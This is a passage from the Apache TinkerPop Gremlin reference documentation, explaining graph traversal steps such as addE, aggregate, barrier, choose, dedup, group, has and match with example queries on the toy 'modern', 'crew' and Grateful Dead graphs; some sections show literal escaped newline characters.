 . The current traversed `S` object -- `Traverser.get()`.
 . The current path traversed by the traverser -- `Traverser.path()`.
 .. A helper shorthand to get a particular path-history object -- `Traverser.path(String) == Traverser.path().get(String)`.
 . The number of times the traverser has gone through the current loop -- `Traverser.loops()`.
 . The number of objects represented by this traverser -- `Traverser.bulk()`.
 . The local data structure associated with this traverser -- `Traverser.sack()`.
 . The side-effects associated with the traversal -- `Traverser.sideEffects()`.
 .. A helper shorthand to get a particular side-effect -- `Traverser.sideEffect(String) == Traverser.sideEffects().get(String)`.

image:map-lambda.png[width=150,float=right]
[gremlin-groovy,modern]
----
g.V(1).out().values('name') <1>
g.V(1).out().map {it.get().value('name')} <2>
----

<1> An outgoing traversal from vertex 1 to the name values of the adjacent vertices.
<2> The same operation, but using a lambda to access the name property values.

image:filter-lambda.png[width=160,float=right]
[gremlin-groovy,modern]
----
g.V().filter {it.get().label() == 'person'} <1>
g.V().hasLabel('person') <2>
----

<1> A filter that only allows the vertex to pass if it has the person label.
<2> The more specific `hasLabel()`-step is implemented as a `filter()` with the respective predicate.


image:side-effect-lambda.png[width=175,float=right]
[gremlin-groovy,modern]
----
g.V().hasLabel('person').sideEffect(System.out.&println) <1>
----

<1> Whatever enters `sideEffect()` is passed to the next step, but some intervening process can occur.

image:branch-lambda.png[width=180,float=right]
[gremlin-groovy,modern]
----
g.V().branch(values('name')).
      option('marko', values('age')).
      option(none, values('name')) <1>
g.V().choose(has('name','marko'),
             values('age'),
             values('name')) <2>
----

<1> If the vertex is "marko", get his age, else get the name of the vertex.
<2> The more specific boolean-based `choose()`-step is implemented as a `branch()`.

[[addedge-step]]
AddEdge Step
~~~~~~~~~~~~

link:http://en.wikipedia.org/wiki/Automated_reasoning[Reasoning] is the process of making explicit what is implicit in the data. What is explicit in a graph are the objects of the graph -- i.e. vertices and edges.
What is implicit in the graph is the traversal. In other words, traversals expose meaning where the meaning is determined by the traversal definition. For example, take the concept of a "co-developer." Two people are co-developers if they have worked on the same project together. This concept can be represented as a traversal and thus, the concept of "co-developers" can be derived. Moreover, what was once implicit can be made explicit via the `addE()`-step (*map*/*sideEffect*).

image::addedge-step.png[width=450]

[gremlin-groovy,modern]
----
g.V(1).as('a').out('created').in('created').where(neq('a')).
  addE('co-developer').from('a').property('year',2009) <1>
g.V(3,4,5).aggregate('x').has('name','josh').as('a').
  select('x').unfold().hasLabel('software').addE('createdBy').to('a') <2>
g.V().as('a').out('created').addE('createdBy').to('a').property('acl','public') <3>
g.V(1).as('a').out('knows').
  addE('livesNear').from('a').property('year',2009).
  inV().inE('livesNear').values('year') <4>
g.V().match(
        __.as('a').out('knows').as('b'),
        __.as('a').out('created').as('c'),
        __.as('b').out('created').as('c')).
  addE('friendlyCollaborator').from('a').to('b').
  property(id,13).property('project',select('c').values('name')) <5>
g.E(13).valueMap()
----

<1> Add a co-developer edge with a year-property between marko and his collaborators.
<2> Add incoming createdBy edges from the josh-vertex to the lop- and ripple-vertices.
<3> Add an inverse createdBy edge for all created edges.
<4> The newly created edge is a traversable object.
<5> Two arbitrary bindings in a traversal can be joined `from()`->`to()`, where `id` can be provided for graphs that support user-provided ids.

[[addvertex-step]]
AddVertex Step
~~~~~~~~~~~~~~

The `addV()`-step is used to add vertices to the graph (*map*/*sideEffect*). For every incoming object, a vertex is created. Moreover, `GraphTraversalSource` maintains an `addV()` method.

[gremlin-groovy,modern]
----
g.addV('person').property('name','stephen')
g.V().values('name')
g.V().outE('knows').addV().property('name','nothing')
g.V().has('name','nothing')
g.V().has('name','nothing').bothE()
----

[[addproperty-step]]
AddProperty Step
~~~~~~~~~~~~~~~~

The `property()`-step is used to add properties to the elements of the graph (*sideEffect*). Unlike `addV()` and `addE()`, `property()` is a full sideEffect step in that it does not return the property it created, but the element that streamed into it. Moreover, if `property()` follows an `addV()` or `addE()`, then it is "folded" into the previous step to enable vertex and edge creation with all its properties in one creation operation.

[gremlin-groovy,modern]
----
g.V(1).property('country','usa')
g.V(1).property('city','santa fe').property('state','new mexico').valueMap()
g.V(1).property(list,'age',35) <1>
g.V(1).valueMap()
g.V(1).property('friendWeight',outE('knows').values('weight').sum(),'acl','private') <2>
g.V(1).properties('friendWeight').valueMap() <3>
----

<1> For vertices, a cardinality can be provided for <<vertex-properties,vertex properties>>.
<2> It is possible to select the property value (as well as key) via a traversal.
<3> For vertices, the `property()`-step can add meta-properties.


[[aggregate-step]]
Aggregate Step
~~~~~~~~~~~~~~

image::aggregate-step.png[width=800]

The `aggregate()`-step (*sideEffect*) is used to aggregate all the objects at a particular point of traversal into a Collection.
The step uses link:http://en.wikipedia.org/wiki/Eager_evaluation[eager evaluation] in that no objects continue on until all previous objects have been fully aggregated (as opposed to <<store-step,`store()`>> which link:http://en.wikipedia.org/wiki/Lazy_evaluation[lazily] fills a collection). The eager evaluation nature is crucial in situations where everything at a particular point is required for future computation. An example is provided below.

[gremlin-groovy,modern]
----
g.V(1).out('created') <1>
g.V(1).out('created').aggregate('x') <2>
g.V(1).out('created').aggregate('x').in('created') <3>
g.V(1).out('created').aggregate('x').in('created').out('created') <4>
g.V(1).out('created').aggregate('x').in('created').out('created').
  where(without('x')).values('name') <5>
----

<1> What has marko created?
<2> Aggregate all his creations.
<3> Who are marko's collaborators?
<4> What have marko's collaborators created?
<5> What have marko's collaborators created that he hasn't created?

In link:http://en.wikipedia.org/wiki/Recommender_system[recommendation systems], the above pattern is used:

 "What has userA liked? Who else has liked those things? What have they liked that userA hasn't already liked?"

Finally, `aggregate()`-step can be modulated via `by()`-projection.

[gremlin-groovy,modern]
----
g.V().out('knows').aggregate('x').cap('x')
g.V().out('knows').aggregate('x').by('name').cap('x')
----

[[and-step]]
And Step
~~~~~~~~

The `and()`-step ensures that all provided traversals yield a result (*filter*). Please see <<or-step,`or()`>> for or-semantics.

[gremlin-groovy,modern]
----
g.V().and(
   outE('knows'),
   values('age').is(lt(30))).
    values('name')
----

The `and()`-step can take an arbitrary number of traversals. All traversals must produce at least one output for the original traverser to pass to the next step.

An link:http://en.wikipedia.org/wiki/Infix_notation[infix notation] can be used as well. Though, with infix notation, only two traversals can be and'd together.

[gremlin-groovy,modern]
----
g.V().where(outE('created').and().outE('knows')).values('name')
----

[[as-step]]
As Step
~~~~~~~

The `as()`-step is not a real step, but a "step modulator" similar to <<by-step,`by()`>> and <<option-step,`option()`>>. With `as()`, it is possible to provide a label to the step that can later be accessed by steps and data structures that make use of such labels -- e.g., <<select-step,`select()`>>, <<match-step,`match()`>>, and path.

[gremlin-groovy,modern]
----
g.V().as('a').out('created').as('b').select('a','b') <1>
g.V().as('a').out('created').as('b').select('a','b').by('name') <2>
----

<1> Select the objects labeled "a" and "b" from the path.
<2> Select the objects labeled "a" and "b" from the path and, for each object, project its name value.

A step can have any number of labels associated with it. This is useful for referencing the same step multiple times in a future step.

[gremlin-groovy,modern]
----
g.V().hasLabel('software').as('a','b','c').
   select('a','b','c').
     by('name').
     by('lang').
     by(__.in('created').values('name').fold())
----

[[barrier-step]]
Barrier Step
~~~~~~~~~~~~

The `barrier()`-step (*barrier*) turns the lazy traversal pipeline into a bulk-synchronous pipeline. This step is useful in the following situations:

 * When everything prior to `barrier()` needs to be executed before moving onto the steps after the `barrier()` (i.e.
ordering).
 * When "stalling" the traversal may lead to a "bulking optimization" in traversals that repeatedly touch many of the same elements (i.e. optimizing).

[gremlin-groovy,modern]
----
g.V().sideEffect{println "first: ${it}"}.sideEffect{println "second: ${it}"}.iterate()
g.V().sideEffect{println "first: ${it}"}.barrier().sideEffect{println "second: ${it}"}.iterate()
----

The theory behind a "bulking optimization" is simple. If there are one million traversers at vertex 1, then there is no need to calculate one million `both()`-computations. Instead, represent those one million traversers as a single traverser with a `Traverser.bulk()` equal to one million and execute `both()` once. A bulking optimization example is made more salient on a larger graph. Therefore, the example below leverages the <<grateful-dead,Grateful Dead graph>>.

[gremlin-groovy]
----
graph = TinkerGraph.open()
graph.io(graphml()).readGraph('data/grateful-dead.xml')
g = graph.traversal(standard())
clockWithResult(1){g.V().both().both().both().count().next()} <1>
clockWithResult(1){g.V().repeat(both()).times(3).count().next()} <2>
clockWithResult(1){g.V().both().barrier().both().barrier().both().barrier().count().next()} <3>
----

<1> A non-bulking traversal where each traverser is processed.
<2> Each traverser entering `repeat()` has its recursion bulked.
<3> A bulking traversal where implicit traversers are not processed.

If `barrier()` is provided an integer argument, then the barrier will only hold `n`-number of unique traversers in its barrier before draining the aggregated traversers to the next step. This is useful in the aforementioned bulking optimization scenario, but reduces the risk of an out-of-memory exception.

The non-default `LazyBarrierStrategy` inserts `barrier()`-steps in a traversal where appropriate in order to gain the "bulking optimization."

[gremlin-groovy]
----
graph = TinkerGraph.open()
graph.io(graphml()).readGraph('data/grateful-dead.xml')
g = graph.traversal(GraphTraversalSource.build().with(LazyBarrierStrategy.instance()).engine(StandardTraversalEngine.build()))
clockWithResult(1){g.V().both().both().both().count().next()}
g.V().both().both().both().count().iterate().toString() <1>
----

<1> With `LazyBarrierStrategy` activated, `barrier()` steps are automatically inserted where appropriate.

[[by-step]]
By Step
~~~~~~~

The `by()`-step is not an actual step, but instead is a "step-modulator" similar to <<as-step,`as()`>> and <<option-step,`option()`>>. If a step is able to accept traversals, functions, comparators, etc. then `by()` is the means by which they are added. The general pattern is `step().by()...by()`. Some steps can only accept one `by()` while others can take an arbitrary amount.

[gremlin-groovy,modern]
----
g.V().group().by(bothE().count()) <1>
g.V().group().by(bothE().count()).by('name') <2>
g.V().group().by(bothE().count()).by('name').by(count(local)) <3>
----

<1> `by(bothE().count())` will group the elements by their edge count (*traversal*).
<2> `by('name')` will process the grouped elements by their name (*element property projection*).
<3> `by(count(local))` will count the number of elements in each group (*traversal*).

[[cap-step]]
Cap Step
~~~~~~~~

The `cap()`-step (*barrier*) iterates the traversal up to itself and emits the sideEffect referenced by the provided key.
If multiple keys are provided, then a `Map<String,Object>` of sideEffects is emitted.

[gremlin-groovy,modern]
----
g.V().groupCount('a').by(label).cap('a') <1>
g.V().groupCount('a').by(label).groupCount('b').by(outE().count()).cap('a','b') <2>
----

<1> Group and count vertices by their label. Emit the side effect labeled 'a', which is the group count by label.
<2> Same as statement 1, but also emit the side effect labeled 'b' which groups vertices by the number of out edges.

[[coalesce-step]]
Coalesce Step
~~~~~~~~~~~~~

The `coalesce()`-step evaluates the provided traversals in order and returns the first traversal that emits at least one element.

[gremlin-groovy,modern]
----
g.V(1).coalesce(outE('knows'), outE('created')).inV().path().by('name').by(label)
g.V(1).coalesce(outE('created'), outE('knows')).inV().path().by('name').by(label)
g.V(1).next().property('nickname', 'okram')
g.V().hasLabel('person').coalesce(values('nickname'), values('name'))
----

[[count-step]]
Count Step
~~~~~~~~~~

image::count-step.png[width=195]

The `count()`-step (*map*) counts the total number of represented traversers in the streams (i.e. the bulk count).

[gremlin-groovy,modern]
----
g.V().count()
g.V().hasLabel('person').count()
g.V().hasLabel('person').outE('created').count().path() <1>
g.V().hasLabel('person').outE('created').count().map {it.get() * 10}.path() <2>
----

<1> `count()`-step is a <<a-note-on-barrier-steps,reducing barrier step>> meaning that all of the previous traversers are folded into a new traverser.
<2> The path of the traverser emanating from `count()` starts at `count()`.

IMPORTANT: `count(local)` counts the current, local object (not the objects in the traversal stream). This works for `Collection`- and `Map`-type objects. For any other object, a count of 1 is returned.

[[choose-step]]
Choose Step
~~~~~~~~~~~

image::choose-step.png[width=700]

The `choose()`-step (*branch*) routes the current traverser to a particular traversal branch option. With `choose()`, it is possible to implement if/else-based semantics as well as more complicated selections.

[gremlin-groovy,modern]
----
g.V().hasLabel('person').
      choose(values('age').is(lte(30)),
        __.in(),
        __.out()).values('name') <1>
g.V().hasLabel('person').
      choose(values('age')).
        option(27, __.in()).
        option(32, __.out()).values('name') <2>
----

<1> If the traversal yields an element, then do `in`, else do `out` (i.e. true/false-based option selection).
<2> Use the result of the traversal as a key to the map of traversal options (i.e. value-based option selection).

However, note that `choose()` can have an arbitrary number of options and moreover, can take an anonymous traversal as its choice function.

[gremlin-groovy,modern]
----
g.V().hasLabel('person').
      choose(values('name')).
        option('marko', values('age')).
        option('josh', values('name')).
        option('vadas', valueMap()).
        option('peter', label())
----

The `choose()`-step can leverage the `Pick.none` option match. For anything that does not match a specified option, the `none`-option is taken.

[gremlin-groovy,modern]
----
g.V().hasLabel('person').
      choose(values('name')).
        option('marko', values('age')).
        option(none, values('name'))
----

[[coin-step]]
Coin Step
~~~~~~~~~

To randomly filter out a traverser, use the `coin()`-step (*filter*).
The provided double argument biases the "coin toss."

[gremlin-groovy,modern]
----
g.V().coin(0.5)
g.V().coin(0.0)
g.V().coin(1.0)
----

[[constant-step]]
Constant Step
~~~~~~~~~~~~~

To specify a constant value for a traverser, use the `constant()`-step (*map*). This is often useful with conditional steps like <<choose-step,`choose()`-step>> or <<coalesce-step,`coalesce()`-step>>.

[gremlin-groovy,modern]
----
g.V().choose(__.hasLabel('person'),
    __.values('name'),
    __.constant('inhuman')) <1>
g.V().coalesce(
    __.hasLabel('person').values('name'),
    __.constant('inhuman')) <2>
----

<1> Show the names of people, but show "inhuman" for other vertices.
<2> Same as statement 1 (unless there is a person vertex with no name).

[[cyclicpath-step]]
CyclicPath Step
~~~~~~~~~~~~~~~

image::cyclicpath-step.png[width=400]

Each traverser maintains its history through the traversal over the graph -- i.e. its <<path-data-structure,path>>. If it is important that the traverser repeat its course, then `cyclicPath()`-step should be used (*filter*). The step analyzes the path of the traverser thus far and if there are no repeats, the traverser is filtered out over the traversal computation. If non-cyclic behavior is desired, see <<simplepath-step,`simplePath()`>>.

[gremlin-groovy,modern]
----
g.V(1).both().both()
g.V(1).both().both().cyclicPath()
g.V(1).both().both().cyclicPath().path()
----

[[dedup-step]]
Dedup Step
~~~~~~~~~~

With `dedup()`-step (*filter*), repeatedly seen objects are removed from the traversal stream. Note that if a traverser's bulk is greater than 1, then it is set to 1 before being emitted.

[gremlin-groovy,modern]
----
g.V().values('lang')
g.V().values('lang').dedup()
g.V(1).repeat(bothE('created').dedup().otherV()).emit().path() <1>
----

<1> Traverse all `created` edges, but don't touch any edge twice.

If a by-step modulation is provided to `dedup()`, then the object is processed accordingly prior to determining if it has been seen or not.

[gremlin-groovy,modern]
----
g.V().valueMap(true, 'name')
g.V().dedup().by(label).values('name')
----

Finally, if `dedup()` is provided an array of strings, then it will ensure that the de-duplication is not with respect to the current traverser object, but to the path history of the traverser.

[gremlin-groovy,modern]
----
g.V().as('a').out('created').as('b').in('created').as('c').select('a','b','c')
g.V().as('a').out('created').as('b').in('created').as('c').dedup('a','b').select('a','b','c') <1>
----

<1> If the current `a` and `b` combination has been seen previously, then filter the traverser.

[[drop-step]]
Drop Step
~~~~~~~~~

The `drop()`-step (*filter*/*sideEffect*) is used to remove elements and properties from the graph (i.e. remove). It is a filter step because the traversal yields no outgoing objects.

[gremlin-groovy,modern]
----
g.V().outE().drop()
g.E()
g.V().properties('name').drop()
g.V().valueMap()
g.V().drop()
g.V()
----

[[fold-step]]
Fold Step
~~~~~~~~~

There are situations when the traversal stream needs a "barrier" to aggregate all the objects and emit a computation that is a function of the aggregate. The `fold()`-step (*map*) is one particular instance of this.
Please see <<unfold-step,`unfold()`>>-step for the inverse functionality.\n\n[gremlin-groovy,modern]\n----\ng.V(1).out('knows').values('name')\ng.V(1).out('knows').values('name').fold() <1>\ng.V(1).out('knows').values('name').fold().next().getClass() <2>\ng.V(1).out('knows').values('name').fold(0) {a,b -> a + b.length()} <3>\ng.V().values('age').fold(0) {a,b -> a + b} <4>\ng.V().values('age').fold(0, sum) <5>\ng.V().values('age').sum() <6>\n----\n\n<1> A parameterless `fold()` will aggregate all the objects into a list and then emit the list.\n<2> A verification of the type of list returned.\n<3> `fold()` can be provided two arguments -- a seed value and a reduce bi-function (\"vadas\" is 5 characters + \"josh\" with 4 characters).\n<4> What is the total age of the people in the graph?\n<5> The same as before, but using a built-in bi-function.\n<6> The same as before, but using the <<sum-step,`sum()`-step>>.\n\n[[group-step]]\nGroup Step\n~~~~~~~~~~\n\nAs traversers propagate across a graph as defined by a traversal, sideEffect computations are sometimes required. That is, the actual path taken or the current location of a traverser is not the ultimate output of the computation, but some other representation of the traversal. The `group()`-step (*sideEffect*) is one such sideEffect that organizes the objects according to some function of the object. Then, if required, that organization (a list) is reduced. An example is provided below.\n\n[gremlin-groovy,modern]\n----\ng.V().group().by(label) <1>\ng.V().group().by(label).by('name') <2>\ng.V().group().by(label).by('name').by(count(local)) <3>\n----\n\n<1> Group the vertices by their label.\n<2> For each vertex in the group, get their name.\n<3> For each grouping, what is its size?\n\nThe three projection parameters available to `group()` via `by()` are:\n\n. Key-projection: What feature of the object to group on (a function that yields the map key)?\n. Value-projection: What feature of the group to store in the key-list?\n. Reduce-projection: What feature of the key-list to ultimately return?\n\n[[groupcount-step]]\nGroupCount Step\n~~~~~~~~~~~~~~~\n\nWhen it is important to know how many times a particular object has been at a particular part of a traversal, `groupCount()`-step (*sideEffect*) is used.\n\n \"What is the distribution of ages in the graph?\"\n\n[gremlin-groovy,modern]\n----\ng.V().hasLabel('person').values('age').groupCount()\ng.V().hasLabel('person').groupCount().by('age') <1>\n----\n\n<1> You can also supply a pre-group projection, where the provided <<by-step,`by()`>>-modulation determines what to group the incoming object by.\n\nThere is one person that is 32, one person that is 35, one person that is 27, and one person that is 29.\n\n \"Iteratively walk the graph and count the number of times you see the second letter of each name.\"\n\nimage::groupcount-step.png[width=420]\n\n[gremlin-groovy,modern]\n----\ng.V().repeat(both().groupCount('m').by(label)).times(10).cap('m')\n----\n\nThe above is interesting in that it demonstrates the use of referencing the internal `Map<Object,Long>` of `groupCount()` with a string variable. Given that `groupCount()` is a sideEffect-step, it simply passes the object it received to its output. Internal to `groupCount()`, the object's count is incremented.\n\n[[has-step]]\nHas Step\n~~~~~~~~\n\nimage::has-step.png[width=670]\n\nIt is possible to filter vertices, edges, and vertex properties based on their properties using `has()`-step (*filter*). 
There are numerous variations on `has()` including:

 * `has(key,value)`: Remove the traverser if its element does not have the provided key/value property.
 * `has(key,predicate)`: Remove the traverser if its element does not have a key value that satisfies the bi-predicate.
 * `hasLabel(labels...)`: Remove the traverser if its element does not have any of the labels.
 * `hasId(ids...)`: Remove the traverser if its element does not have any of the ids.
 * `hasKey(keys...)`: Remove the traverser if its property does not have any of the keys.
 * `hasValue(values...)`: Remove the traverser if its property does not have any of the values.
 * `has(key)`: Remove the traverser if its element does not have a value for the key.
 * `hasNot(key)`: Remove the traverser if its element has a value for the key.
 * `has(key, traversal)`: Remove the traverser if its object does not yield a result through the traversal off the property value.

[gremlin-groovy,modern]
----
g.V().hasLabel('person')
g.V().hasLabel('person').out().has('name',within('vadas','josh'))
g.V().hasLabel('person').out().has('name',within('vadas','josh')).
      outE().hasLabel('created')
g.V().has('age',inside(20,30)).values('age') <1>
g.V().has('age',outside(20,30)).values('age') <2>
g.V().has('name',within('josh','marko')).valueMap() <3>
g.V().has('name',without('josh','marko')).valueMap() <4>
g.V().has('name',not(within('josh','marko'))).valueMap() <5>
----

<1> Find all vertices whose ages are between 20 (inclusive) and 30 (exclusive).
<2> Find all vertices whose ages are not between 20 (inclusive) and 30 (exclusive).
<3> Find all vertices whose names are exact matches to any names in the collection `[josh,marko]`, display all the key,value pairs for those vertices.
<4> Find all vertices whose names are not in the collection `[josh,marko]`, display all the key,value pairs for those vertices.
<5> Same as the prior example save using `not` on `within` to yield `without`.

TinkerPop does not support a regular expression predicate, although specific graph databases that leverage TinkerPop may
provide a partial match extension.
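The `has(key, traversal)` variant in the list above is not shown in the examples; a minimal sketch of its use (the traversal is applied to the property value and the element passes only if it yields a result):

[source,groovy]
----
g.V().has('age', __.is(gt(30))).values('name') // people whose age value passes the inner traversal
----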
[[inject-step]]
Inject Step
~~~~~~~~~~~

image::inject-step.png[width=800]

One of the major features of TinkerPop3 is "injectable steps." This makes it possible to insert objects arbitrarily into a traversal stream. In general, `inject()`-step (*sideEffect*) exists and a few examples are provided below.

[gremlin-groovy,modern]
----
g.V(4).out().values('name').inject('daniel')
g.V(4).out().values('name').inject('daniel').map {it.get().length()}
g.V(4).out().values('name').inject('daniel').map {it.get().length()}.path()
----

In the last example above, note that the path starting with `daniel` is only of length 2. This is because the `daniel` string was inserted half-way in the traversal. Finally, a typical use case is provided below -- when the start of the traversal is not a graph object.

[gremlin-groovy,modern]
----
inject(1,2)
inject(1,2).map {it.get() + 1}
inject(1,2).map {it.get() + 1}.map {g.V(it.get()).next()}.values('name')
----

[[is-step]]
Is Step
~~~~~~~

It is possible to filter scalar values using `is()`-step (*filter*).

[gremlin-groovy,modern]
----
g.V().values('age').is(32)
g.V().values('age').is(lte(30))
g.V().values('age').is(inside(30, 40))
g.V().where(__.in('created').count().is(1)).values('name') <1>
g.V().where(__.in('created').count().is(gte(2))).values('name') <2>
g.V().where(__.in('created').values('age').
            mean().is(inside(30d, 35d))).values('name') <3>
----

<1> Find projects having exactly one contributor.
<2> Find projects having two or more contributors.
<3> Find projects whose contributors' average age is between 30 and 35.

[[limit-step]]
Limit Step
~~~~~~~~~~

The `limit()`-step is analogous to <<range-step,`range()`-step>> save that the lower end range is set to 0.

[gremlin-groovy,modern]
----
g.V().limit(2)
g.V().range(0, 2)
g.V().limit(2).toString()
----

The `limit()`-step can also be applied with `Scope.local`, in which case it operates on the incoming collection. The examples below use the <<the-crew-toy-graph,The Crew>> toy data set.

[gremlin-groovy,theCrew]
----
g.V().valueMap().select('location').limit(local,2) <1>
g.V().valueMap().limit(local, 1) <2>
----

<1> `List<String>` for each vertex containing the first two locations.
<2> `Map<String, Object>` for each vertex, but containing only the first property value.

[[local-step]]
Local Step
~~~~~~~~~~

image::local-step.png[width=450]

A `GraphTraversal` operates on a continuous stream of objects. In many situations, it is important to operate on a single element within that stream. To do such object-local traversal computations, `local()`-step exists (*branch*). Note that the examples below use the <<the-crew-toy-graph,The Crew>> toy data set.

[gremlin-groovy,theCrew]
----
g.V().as('person').
      properties('location').order().by('startTime',incr).limit(2).value().as('location').
      select('person','location').by('name').by() <1>
g.V().as('person').
      local(properties('location').order().by('startTime',incr).limit(2)).value().as('location').
      select('person','location').by('name').by() <2>
----

<1> Get the first two people and their respective location according to the most historic location start time.
<2> For every person, get their two most historic locations.

The two traversals above look nearly identical save the inclusion of `local()` which wraps a section of the traversal in an object-local traversal. As such, the `order().by()` and the `limit()` refer to a particular object, not to the stream as a whole.

WARNING: The anonymous traversal of `local()` processes the current object "locally." In OLAP, where the atomic unit of computing is the vertex and its local "star graph," it is important that the anonymous traversal does not leave the confines of the vertex's star graph. In other words, it can not traverse to an adjacent vertex's properties or edges.

[[mapkeys-step]]
MapKeys Step
~~~~~~~~~~~~

The `mapKeys()`-step (*flatMap*) takes an incoming map and emits its keys.
This is especially useful when one is only interested in the top N elements in a `groupCount()` ranking.\n \n[gremlin-groovy]\n----\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(standard())\ng.V().hasLabel(\"song\").out(\"followedBy\").groupCount().by(\"name\").\n order(local).by(valueDecr).limit(local, 5)\ng.V().hasLabel(\"song\").out(\"followedBy\").groupCount().by(\"name\").\n order(local).by(valueDecr).limit(local, 5).mapKeys()\n----\n\n[[mapvalues-step]]\nMapValues Step\n~~~~~~~~~~~~~~\n \nThe `mapValues()`-step (*flatMap*) takes an incoming map and emits its values.\n \n[gremlin-groovy]\n----\ngraph.io(graphml()).readGraph('data\/grateful-dead.xml')\ng = graph.traversal(standard())\n:set max-iteration 10\ng.V().hasLabel(\"song\").out(\"sungBy\").groupCount().by(\"name\").next() <1>\ng.V().hasLabel(\"song\").out(\"sungBy\").groupCount().by(\"name\").mapValues() <2>\ng.V().hasLabel(\"song\").out(\"sungBy\").groupCount().by(\"name\").mapValues().groupCount().\n order(local).by(valueDecr).limit(local, 5).next() <3>\n----\n \n<1> Which artist sung how many songs?\n<2> Get an anonymized set of song repertoire sizes.\n<3> What are the 5 most common song repertoire sizes?\n\n[[match-step]]\nMatch Step\n~~~~~~~~~~\n\nThe `match()`-step (*map*) provides a more link:http:\/\/en.wikipedia.org\/wiki\/Declarative_programming[declarative] form of graph querying based on the notion of link:http:\/\/en.wikipedia.org\/wiki\/Pattern_matching[pattern matching]. With `match()`, the user provides a collection of \"traversal fragments,\" called patterns, that have variables defined that must hold true throughout the duration of the `match()`. When a traverser is in `match()`, a registered `MatchAlgorithm` analyzes the current state of the traverser (i.e. its history based on its <<path-data-structure,path data>>), the runtime statistics of the traversal patterns, and returns a traversal-pattern that the traverser should try next. The default `MatchAlgorithm` provided is called `CountMatchAlgorithm` and it dynamically revises the pattern execution plan by sorting the patterns according to their filtering capabilities (i.e. largest set reduction patterns execute first). For very large graphs, where the developer is uncertain of the statistics of the graph (e.g. how many `knows`-edges vs. `worksFor`-edges exist in the graph), it is advantageous to use `match()`, as an optimal plan will be determined automatically. Furthermore, some queries are much easier to express via `match()` than with single-path traversals.\n\n \"Who created a project named 'lop' that was also created by someone who is 29 years old? Return the two creators.\"\n\nimage::match-step.png[width=500]\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('created').as('b'),\n __.as('b').has('name', 'lop'),\n __.as('b').in('created').as('c'),\n __.as('c').has('age', 29)).\n select('a','c').by('name')\n----\n\nNote that the above can also be more concisely written as below which demonstrates that standard inner-traversals can be arbitrarily defined.\n\n[gremlin-groovy,modern]\n----\ng.V().match(\n __.as('a').out('created').has('name', 'lop').as('b'),\n __.as('b').in('created').has('age', 29).as('c')).\n select('a','c').by('name')\n----\n\n[[grateful-dead]]\n.Grateful Dead\nimage::grateful-dead-schema.png[width=475]\n\n`MatchStep` brings functionality similar to link:http:\/\/en.wikipedia.org\/wiki\/SPARQL[SPARQL] to Gremlin. Like SPARQL, MatchStep conjoins a set of patterns applied to a graph. 
For example, the following traversal finds exactly those songs which Jerry Garcia has both sung and written (using the Grateful Dead graph distributed in the `data/` directory):

[gremlin-groovy]
----
graph.io(graphml()).readGraph('data/grateful-dead.xml')
g = graph.traversal(standard())
g.V().match(
      __.as('a').has('name', 'Garcia'),
      __.as('a').in('writtenBy').as('b'),
      __.as('a').in('sungBy').as('b')).
    select('b').values('name')
----

Among the features which differentiate `match()` from SPARQL are:

[gremlin-groovy,modern]
----
g.V().match(
      __.as('a').out('created').has('name','lop').as('b'), <1>
      __.as('b').in('created').has('age', 29).as('c'),
      __.as('c').repeat(out()).times(2)). <2>
    select('c').out('knows').dedup().values('name') <3>
----

<1> *Patterns of arbitrary complexity*: `match()` is not restricted to triple patterns or property paths.
<2> *Recursion support*: `match()` supports the branch-based steps within a pattern, including `repeat()`.
<3> *Imperative/declarative hybrid*: Before and after a `match()`, it is possible to leverage classic Gremlin traversals.

To extend point #3, it is possible to support going from imperative, to declarative, to imperative, ad infinitum.

[gremlin-groovy,modern]
----
g.V().match(
      __.as('a').out('knows').as('b'),
      __.as('b').out('created').has('name','lop')).
    select('b').out('created').
    match(
      __.as('x').in('created').as('y'),
      __.as('y').out('knows').as('z')).
    select('z').values('name')
----

IMPORTANT: The `match()`-step is stateless. The variable bindings of the traversal patterns are stored in the path history of the traverser. As such, the variables used over all `match()`-steps within a traversal are globally unique. A benefit of this is that subsequent `where()`, `select()`, `match()`, etc. steps can leverage the same variables in their analysis.

Like all other steps in Gremlin, `match()` is a function and thus, `match()` within `match()` is a natural consequence of Gremlin's functional foundation (i.e. recursive matching).

[gremlin-groovy,modern]
----
g.V().match(
      __.as('a').out('knows').as('b'),
      __.as('b').out('created').has('name','lop'),
      __.as('b').match(
          __.as('b').out('created').as('c'),
          __.as('c').has('name','ripple')).
        select('c').as('c')).
    select('a','c').by('name')
----

If a step-labeled traversal precedes the `match()`-step and the traverser entering the `match()` is destined to bind to a particular variable, then the previous step should be labeled accordingly.

[gremlin-groovy,modern]
----
g.V().as('a').out('knows').as('b').
      match(
        __.as('b').out('created').as('c'),
        __.not(__.as('c').in('created').as('a'))).
      select('a','b','c').by('name')
----

There are three types of `match()` traversal patterns.

 . `as('a')...as('b')`: both the start and end of the traversal have a declared variable.
 . `as('a')...`: only the start of the traversal has a declared variable.
 . `...`: there are no declared variables.

If a variable is at the start of a traversal pattern it *must* exist as a label in the path history of the traverser else the traverser can not go down that path. If a variable is at the end of a traversal pattern then if the variable exists in the path history of the traverser, the traverser's current location *must* match (i.e. equal) its historic location at that same label.
However, if the variable does not exist in the path history of the traverser, then the current location is labeled as the variable and thus, becomes a bound variable for subsequent traversal patterns. If a traversal pattern does not have an end label, then the traverser must simply \"survive\" the pattern (i.e. not be filtered) to continue to the next pattern. If a traversal pattern does not have a start label, then the traverser can go down that path at any point, but will only go down that pattern once as a traversal pattern is executed once and only once for the history of the traverser. Typically, traversal patterns that do not have a start and end label are used in conjunction with `and()`, `or()`, and `where()`. Once the traverser has \"survived\" all the patterns (or at least one for `or()`), `match()`-step analyzes the traverser's path history and emits a `Map<String,Object>` of the variable bindings to the next step in the traversal.\n\n[gremlin-groovy,modern]\n----\ng.V().as('a').out().as('b'). <1>\n match( <2>\n __.as('a').out().count().as('c'), <3>\n __.not(__.as('a').in().as('b')), <4>\n or( <5>\n __.as('a').out('knows').as('b'),\n __.as('b').in().count().as('c').and().as('c').is(gt(2)))). <6>\n dedup('a','c'). <7>\n select('a','b','c').by('name').by('name').by() <8>\n----\n\n<1> A standard, step-labeled traversal can come prior to `match()`.\n<2> If the traverser's path prior to entering `match()` has requisite label values, then those historic values are bound.\n<3> It is possible to use <<a-note-on-barrier-steps,barrier steps>> though they are computed locally to the pattern (as one would expect).\n<4> It is possible to `not()` a pattern.\n<5> It is possible to nest `and()`- and `or()`-steps for conjunction matching.\n<6> Both infix and prefix conjunction notation is supported.\n<7> It is possible to \"distinct\" the specified label 